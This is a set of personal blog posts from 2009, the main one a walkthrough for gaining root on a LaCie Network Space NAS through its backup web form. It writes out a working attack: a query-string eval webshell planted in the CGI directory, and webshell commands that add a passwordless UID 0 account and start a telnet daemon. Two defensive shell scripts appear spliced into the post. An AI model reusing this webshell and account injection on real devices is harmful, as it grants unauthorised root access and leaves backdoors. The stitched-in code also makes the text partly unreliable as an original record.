2009-08-14
More on the NAS
The whole reason I went to the bother of trying to get root on the NAS was that the version of Twonky on there does not work properly with my Bravia TV. MP3s cut off after 20 seconds or so, obviously not the best situation. What I did in the end was try out another piece of DLNA server software, minidlna - I first tried installing it using ipkg but it didn't work, and I was a little annoyed that it shoved its massive log files and database on /tmp - I wanted to keep them on the user part of the disk. The reason the log files are so big is that they are complaining constantly about inotify not being available - that's a kernel version thing I think, so I have turned it off in the config file, which unfortunately means I'll have to manually rescan the drive to rebuild the media database. After compiling a version from the latest source though, it works perfectly in terms of music playback. I haven't got any video files of the right type hanging around at the moment so I'm not sure whether that works, but at least MP3s are playing all the way through now. So I disabled Twonky and mt-daapd (I don't use iTunes) and left minidlna enabled.
2009-08-10
Get root on the Lacie Network Space without opening it
Note - following these instructions is very likely to invalidate your warranty and possibly brick your network space. I take no responsibility for this. You have been warned.
As I mentioned the other day I had problems playing media on my new TV from my Lacie Network Space NAS. There are instructions on the Nas Central Wiki for taking apart your NAS, attaching the drive to another (Linux) computer and overwriting stuff. Most of this info was gained from a site describing how to hack another NAS, the Edmini V2. Tantalisingly, in the comments for that page there was an instruction for getting this working purely through software. The instructions were slightly difficult to follow so I have decided to document them again here, but really they belong to the anonymous commenter.
This whole hack revolves around the backup function of the NAS, which allows one to back up the contents of a USB device to the hard disk. Fortunately for us, the parameters for this backup are all sent via fields in a web form - which allows us to download the page, alter the parameters to suit our purposes and away we go. To start I created a Linux Ext3 formatted USB key (I used an Ubuntu development virtual machine). I created a file webshell on my desktop with the contents:
#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING
And also downloaded a telnet daemon to the desktop. Next I created a directory on the stick, copied the files over and set the file permissions:
mkdir /media/disk/hack
cp Desktop/utelnetd /media/disk/hack
cp Desktop/webshell /media/disk/hack
chmod -R +x /media/disk/hack
I popped the stick in the USB port on the front of the Lacie and navigated to the config pages at http://nas/config from my laptop. I did a view source, cut and pasted everything into a new text file on my desktop and searched for:
common.js - prepended http://nas/ to the start of the src (src='http://nas/javascripts/common.js')
edit_form - prepended http://nas/cgi-bin/admin/ to the start of the action (action='http://nas/cgi-bin/admin/backup')
usbdisksdb1 - changed the value to match the directory name on the stick (value='/home/usbdisksdb1/hack')
selected - changed the value to the web cgi directory (value='/www/cgi-bin/admin')
I saved the file on my desktop, opened it in Firefox and hit the Start button. An error flashed by as the page redirected, but the lights on the NAS and the USB stick both flashed and eventually the page redirected to the NAS version of itself.
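The root cause here is that the backup handler trusts source and destination paths that arrive in form fields. The following is an added example, not LaCie firmware code or anything from the original post, of the server-side check such a handler needs; the function names and both allowed roots are assumptions.

```shell
#!/bin/sh
# Added example, not firmware code. All names and both roots are assumptions.
ALLOWED_SRC_ROOT="${ALLOWED_SRC_ROOT:-/home/usbdisks}"  # hypothetical USB mount root
ALLOWED_DST_ROOT="${ALLOWED_DST_ROOT:-/home/share}"     # hypothetical user-data root

# Print the physical path of an existing absolute directory
# (symlinks and ".." resolved); fail for anything else.
canonical_dir() {
    case "$1" in
        /*) ;;
        *) return 1 ;;
    esac
    [ -d "$1" ] || return 1
    (cd "$1" 2>/dev/null && pwd -P)
}

# Succeed only if directory $1 resolves to $2 or something beneath it.
inside_root() {
    path=$(canonical_dir "$1") || return 1
    root=$(canonical_dir "$2") || return 1
    case "$path/" in
        "$root"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Validate the source and destination fields of a backup request.
# Prints the verdict and returns 0 only when both fields are acceptable.
backup_paths_ok() {
    src=$1 dst=$2
    if ! inside_root "$src" "$ALLOWED_SRC_ROOT"; then
        echo "reject: source outside $ALLOWED_SRC_ROOT"; return 1
    fi
    if ! inside_root "$dst" "$ALLOWED_DST_ROOT"; then
        echo "reject: destination outside $ALLOWED_DST_ROOT"; return 1
    fi
    echo "accept"
}
```

Comparing the resolved physical paths is what stops a destination such as the web CGI directory from being reached through ".." or a symlink inside the share. Copying without preserving execute bits, or mounting the data area noexec, limits the damage if a check like this is ever missed.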
The NAS creates a timestamped backup directory. Fortunately there is a way to see what this directory is called using the Twonky server (which is, ironically, the thing that isn't working in the first place). Navigate to http://nas:9000/rpc/set_option?contentbase=/ (this presumes that you've unlocked access to the Twonky config page). Then to http://nas:9000/config where you can hit one of the Browse buttons and navigate down through: /www/cgi-bin/admin/ and see your folder name. Cut this name out, in my case it was: hack-200001030801946888523 and paste it into the following string:
http://nas/cgi-bin/admin/'FOLDER'/webshell?ls
I was rewarded with a directory listing appearing in Firefox. At this point I followed another comment, by Danny Milot, and did:
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?find / -name passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp passwd passwd.ori; ls -als passwd*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:x:0:0:Linux User,,,:/home:/bin/sh >> /etc/passwd; echo sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin >> /etc/passwd; cat /etc/passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:$1$4VBM4/sM$R2TB/cCBAb11R5LH4VGhU/:12488:0:99999:7:::; echo Password for new_root is admin
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp shadow shadow.ori; ls -als shadow*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root::12488:0:99999:7::: >> /etc/shadow; echo No password; cat /etc/shadow
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?./utelnetd
At this point I was able to successfully telnet into the NAS, using new_root as the username and a blank password. I'm lazy so I decided to use ipkg to install things. I followed the manual bootstrap instructions, which didn't work at first until I removed a spurious entry in the resolv.conf by rewriting the file with echo and pipes. Then it was a case of:
ipkg update
ipkg install openssh
ipkg install nano
Then just a case of sorting out some startup scripts:
cp /opt/etc/init.d/S40sshd /etc/init.d/sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S20sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc6.d/K09sshd
Then changing the password:
passwd new_root
Finally, there is a cleanup file that resets and deletes things, at /etc/rc.d/rc3.d/S12cleanConf - so I just commented everything out in it. I rebooted and SSH didn't come up. This was because of the .optware directory not mounting. I copied the contents of that out to the user area and then stuck it in the fstab:
mkdir /home/.optware
cp -r /share/.optware/* /home/.optware
echo /share/.optware /opt auto rw,bind 0 0 >> /etc/fstab
And then created a /etc/rc.d/rc3.d/S12mountopt file with mount /opt in it.
Then the webshell hack and the utelnetd can be removed and Bob's your uncle.
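For anyone checking a NAS for the state this procedure leaves behind, here is an added example (not from the original post) that flags extra UID 0 accounts, empty shadow password fields and unexpected entries in a CGI directory. The function names, the manifest format and the sample files are assumptions; the new_root and sshd sample lines are the ones appended in the commands above.

```shell
#!/bin/sh
# Added example, not from the post. audit_accounts and audit_cgi_dir are
# assumed names; file locations are passed in so copies can be checked offline.

# Report non-root accounts with UID 0 and accounts whose shadow password
# field is empty (login with no password).
audit_accounts() {   # $1 = passwd file, $2 = shadow file
    awk -F: '$3 == 0 && $1 != "root" { print "uid0-account:" $1 }' "$1"
    awk -F: '$2 == ""                { print "empty-password:" $1 }' "$2"
}

# Report entries in a CGI directory that are not in a known-good manifest
# (one name per line).
audit_cgi_dir() {    # $1 = CGI directory, $2 = manifest file
    for entry in "$1"/* "$1"/.[!.]*; do
        [ -e "$entry" ] || continue
        name=${entry##*/}
        grep -Fxq -- "$name" "$2" || echo "unexpected-cgi-entry:$name"
    done
}

# Constructed sample data: a stock root line plus the lines the post
# appends to /etc/passwd and /etc/shadow, and a made-up CGI directory.
write_sample() {     # $1 = scratch directory
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
new_root:x:0:0:Linux User,,,:/home:/bin/sh
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
EOF
    cat > "$1/shadow" <<'EOF'
root:*:12488:0:99999:7:::
new_root::12488:0:99999:7:::
EOF
    mkdir -p "$1/cgi/hack-EXAMPLE"
    : > "$1/cgi/backup"
    echo backup > "$1/manifest"
}
```

On the sample data, audit_accounts reports new_root twice (UID 0 and empty password) and audit_cgi_dir reports the hack-EXAMPLE directory. On a real device the same functions would be pointed at /etc/passwd, /etc/shadow and the CGI directory, with a manifest taken from a known-good firmware image.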
2009-08-09
New Telly
I bought a new TV, a Sony Bravia KDL-32V5500. It's a shiny thing that has an Ethernet port and is DLNA compliant, so can act as a media player for UPnP devices. I spent a good portion of yesterday trying to set it up. I also own a Lacie 1TB Network Space tiny little NAS. Although the TV saw the NAS without too many problems there was an issue playing MP3s from it. Files would play for about 20 seconds and then cut out with an error, "Playback not available". Obviously this isn't ideal.
I spent ages fiddling with the settings on the NAS, and even longer trying to get a DLNA server set up on the PC and discoverable by the TV. I'm not really kidding when I say I probably could have written a basic server in the same time! Eventually I got Twonky MediaManager set up. This is, under the hood, a later version of the same software that is running on the NAS. I had it use the NAS as its content directories for direct comparison - MP3 playback of the same set of songs that had caused issues via DLNA streamed across to the TV fine. So I can only surmise that it's the fault of the underpowered NAS or the version (4.4.6) of Twonky installed on it. On some NASs of this class it's easy to get a root shell and update or even install new software, not on the Lacie which is somewhat locked down. There are some instructions available on how to pop the case and get a root shell by popping the case and connecting the hard drive to a Linux computer. I would prefer a software exploit if possible though - and don't actually know whether Twonky is available for that device in a later version. There are other DLNA servers that I could try running though.
So for now the NAS must remain simple storage unfortunately, and we'll have to play media off our laptops. That will give me some breathing space to think about possibly building an HTPC (the ION Atom boards spring to mind) or getting a PS3 and chucking Linux on it.
2009-08-04
Y Not Festival
So, back from the Y Not festival at the weekend and feeling very glad that I'd also taken the Tuesday off work. I think I needed it being as I went to bed at 8pm Monday, didn't get up until 10:30am Tuesday and still feel a bit wonky for it.
The festival itself was a wee bit muddy, but all in all very good fun, especially given that tickets were only £42 each. Highlight act of the festival has to be Beardyman who just absolutely rocked a packed tent. I had Andy falling off a hay-bale next to me every five minutes or so whilst he was dancing. I'm a little bit vague on what bands I saw, especially on the Saturday, when Big Rich came up for the day. I seem to remember seeing more sound-checks and the inside of the beer tent more than bands. I do recall the bands of Sunday a little better, when we seemed to synchronise our presence at the stages with stuff actually being on. I really enjoyed Kill It Kid, who were a bit of a surprise watch, them being on at the wrong time and different stage.
